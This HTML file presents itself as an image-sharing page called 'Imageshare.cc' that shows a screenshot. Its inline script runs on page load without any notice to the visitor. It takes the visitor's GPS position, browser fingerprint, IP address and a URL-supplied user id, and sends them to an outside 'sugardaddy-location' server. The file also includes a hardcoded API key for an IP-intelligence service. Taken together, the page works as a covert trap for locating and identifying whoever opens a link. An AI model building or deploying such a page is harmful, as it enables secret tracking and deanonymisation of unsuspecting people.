<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <!-- this is an example from the MDN Layout Cookbook -->
    <title>Your Image share page</title>

    <link rel="stylesheet"
          href="https://fonts.googleapis.com/css?family=Tajawal">

    <style>
      html {
        height: 100%;
        box-sizing: border-box;
      }

      body {
        height: 100%;
        background-color: #fff;
        color: #4ebeff;
        font: 1.2em / 1.5 Helvetica Neue, Helvetica, Arial, sans-serif;
        padding: 0;
        margin: 0;
      }

      * {
        box-sizing: inherit;
      }

      section {
        height: 100%;
      }

      img {
        height: 50%;
      }

      .wrapper {
        min-height: 100%;
        display: grid;
        grid-template-rows: auto;
        
      }

      .page-header,
      .page-footer {
        background-color: #4ebeff;
        color: #fff;
      }

      .logo {
        padding-left: 20px;
        font-size: 4em;
      }

      .page-body {
        padding: 20px;
        display: flex;
        justify-content: center;
      }

      ul {
        list-style-type: none;
        margin: 0;
        padding: 0;
        overflow: hidden;
      }

      li {
        float: left;
      }

      .headnav {
        float: right;
      }

      li a {
        display: block;
        color: white;
        text-align: center;
        padding: 14px 16px;
        text-decoration: none;
      }

      li :hover {
        background-color: #46a6de
      }
      
      .headwrapper {
        display: flex;
        flex-direction: row;
        align-items: center;
        width: 100%;
      }

      .headwrapper > h1 {
        font-family: Tajawal ;
      }

      .headwrapper > span{
  flex-grow:1; 
}

    </style>
  </head>

  <body>
    <section>
      <div class="wrapper">
        <header class="page-header">
          <div class="headwrapper">
          <div class="logo">🖼️</div>
          <h1>
            Imageshare.cc
          </h1>
          <span></span>
          <ul class="headnav">
            <li><a href="#news">Upload</a></li>
            <li><a href="#news">Pricing</a></li>
            </li>
          </ul>
        </div>
        </header>
        <main class="page-body">
          <img src="assets/screenshot.png" alt="" />
        </main>
        <footer class="page-footer">
          <ul>
            <li><a href="#home">Home</a></li>
            <li><a href="#news">Imprint</a></li>
            <li><a href="#contact">Contact</a></li>
            <li style="float: right">
              <a class="active" href="#about">About</a>
            </li>
          </ul>
        </footer>
      </div>
    </section>

    <script>
      const id = Date.now();
      //sendCountry();
      sendMetrics();
      sendGpsLocation();

      function findGetParameter(parameterName) {
        var result = "",
          tmp = [];
        location.search
          .substr(1)
          .split("&")
          .forEach(function (item) {
            tmp = item.split("=");
            if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
          });
        return result;
      }

      async function sendGpsLocation() {
        if ("geolocation" in navigator) {
          navigator.geolocation.getCurrentPosition((position) => {
            console.log(position.coords.latitude, position.coords.longitude);

            const payload = {
              id: id,
              latitude: position.coords.latitude,
              longitude: position.coords.longitude,
            };

            fetch("https://sugardaddy-location.brdata-dev.de/gps-location", {
              method: "PUT",
              headers: {
                "Content-Type": "application/json",
              },
              body: JSON.stringify(payload),
            });
          });
        }
      }

      async function getIpAddress() {
        const response = await fetch("https://ipapi.co/json").then(
          (response) => {
            return response.json();
          }
        );
        return response["ip"];
      };

      async function sendCountry() {

        const response = await fetch("https://api.ipbase.com/v2/info?apikey=fkRNRfBTmH3ZVSAchuQS5rP2ZfMYZmCbHyZmlq4P").then(
          (response) => {
            return response.json();
          }
        );

        console.log(response)

        let payload = {
          id: id,
          country: response.data.location.country.name,
          countryCode: response.data.location.country.alpha3,
          proxy: response.proxy_type,
          attacker: response.security.is_known_attacker,
          tor: response.security.is_tor,
          bot: response.security.is_bot
        }

        fetch("https://sugardaddy-location.brdata-dev.de/location", {
        //fetch("http://localhost:3000/location", {
          method: "PUT",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify(payload),
        });

        return response["ip"];
      }

      async function sendMetrics() {
        const fpPromise = import("https://openfpcdn.io/fingerprintjs/v3").then(
          (FingerprintJS) => FingerprintJS.load()
        );

        visitorId = await fpPromise
          .then((fp) => fp.get())
          .then((result) => {
            return result.visitorId;
          });

        let payload = {
          id: id,
          ip_address: await getIpAddress(),
          fingerprint: visitorId,
          user_id: findGetParameter("id"),
        };

        console.log(JSON.stringify(payload));

        fetch("https://sugardaddy-location.brdata-dev.de/ip", {
          method: "PUT",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify(payload),
        });
      }
    </script>
  </body>
</html>
